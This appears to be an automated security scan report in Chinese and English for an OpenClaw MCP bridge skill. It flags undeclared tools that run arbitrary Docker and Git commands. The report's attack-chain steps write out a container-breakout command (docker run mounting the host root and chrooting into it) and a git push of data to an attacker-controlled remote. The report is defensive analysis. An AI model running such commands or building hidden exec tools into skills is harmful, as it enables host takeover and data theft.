中文 EN

扫描报告

扫描新文件

高风险 — 风险评分 68/100
上次扫描:1 天前 重新扫描
68 /100
zanna-aperta
MCP Bridge completo per OpenClaw con 45 tool per agenti, workspace, progetti, cron, browser, canvas, nodes, messaging, gateway, Ollama e ClawX
Skill contains undeclared exec_docker and exec_git tools allowing arbitrary shell command execution, plus suspicious 'ragretrevers' directory naming pattern indicative of covert operations.
技能名称zanna-aperta
分析耗时43.0s
引擎pi
不要安装此技能
Do not deploy. Remove undeclared exec tools or properly document them with restricted command allowlists. Investigate the 'ragretrevers' directory name origin.

攻击链 5 步

入口 Skill masquerades as MCP bridge for OpenClaw with 45 declared tools
SKILL.md:1
提权 Attacker discovers undeclared exec_docker/exec_git tools via tools/list
zanna-aperta.py:467
提权 Attacker executes arbitrary Docker commands (docker run --rm -v /:/host alpine chroot /host sh)
zanna-aperta.py:467
提权 Attacker uses exec_git to push sensitive data to external repo (git push --all attacker-controlled remote)
zanna-aperta.py:479
影响 Full container breakout and data exfiltration via git remote
zanna-aperta.py:479

安全发现 6 项

严重性 安全发现 位置
高危
Undeclared arbitrary Docker command execution 代码执行
exec_docker function accepts arbitrary command strings via command.split() and executes them with subprocess.run. Not declared in SKILL.md tool list.
result = subprocess.run(["docker"] + command.split(), capture_output=True, text=True, timeout=60)
→ Remove or document with strict command allowlist (e.g., only 'ps', 'images', 'containers list')
 zanna-aperta.py:467
高危
Undeclared arbitrary Git command execution 代码执行
exec_git function accepts arbitrary command strings and executes them. Allows git clone, git push --all, git config, etc.
result = subprocess.run(["git"] + command.split(), capture_output=True, text=True, timeout=30, cwd=WORKSPACE)
→ Remove or restrict to read-only commands (status, log, diff)
 zanna-aperta.py:479
中危
SKILL.md missing exec tools declaration 文档欺骗
SKILL.md lists 45 tools but does not mention exec_docker or exec_git which provide direct shell access
## Tool Disponibili (45)
→ Add exec_docker and exec_git to documentation with security caveats
 SKILL.md:1
中危
Suspicious directory naming pattern 敏感访问
MEMORY_DIR set to 'memory/ragretrevers' - 'ragretrevers' reads as 'regret revers' suggesting hidden/undo operations
MEMORY_DIR = f"{WORKSPACE}/memory/ragretrevers"
→ Investigate purpose of 'ragretrevers' directory; rename if not legitimate
 zanna-aperta.py:19
中危
Undeclared subprocess usage throughout 权限提升
Nearly all 45 tools use subprocess to invoke openclaw CLI - this is a de facto shell:WRITE capability not declared in SKILL.md
result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
→ Document shell:WRITE capability in SKILL.md security section
 zanna-aperta.py:64
低危
Unpinned external tool dependencies 供应链
Skill relies on docker, git, pnpm, ollama binaries without version checks or pinning
subprocess.run(["docker"] + command.split()
→ Add version checks for required binaries
 zanna-aperta.py:467
资源类型声明权限推断权限状态证据
文件系统 WRITE WRITE ✓ 一致 workspace_create, project_create write to disk
命令执行 NONE WRITE ✗ 越权 exec_docker (line 467), exec_git (line 479) accept arbitrary commands
网络访问 READ READ ✓ 一致 Ollama API calls to localhost:11434
技能调用 NONE WRITE ✗ 越权 sessions_send, cron_add allow arbitrary message injection

目录结构

2 文件 · 57.2 KB · 1499 行
Python 1f · 1435L Markdown 1f · 64L
├─ 📝 SKILL.md Markdown 64L · 1.6 KB
└─ 🐍 zanna-aperta.py Python 1435L · 55.6 KB

依赖分析 4 项

包名版本来源已知漏洞备注
docker * system Binary not pinned, accessed via subprocess
git * system Binary not pinned, accessed via subprocess
pnpm * system Used for ClawX startup via pnpm run dev
ollama * system Optional local AI, called via curl

安全亮点

✓ Skill follows standard MCP protocol structure
✓ Input validation via inputSchema in tool definitions
✓ Timeout limits on subprocess calls (30-300s)
✓ JSON-RPC error handling present
✓ No base64-encoded payloads or obfuscation detected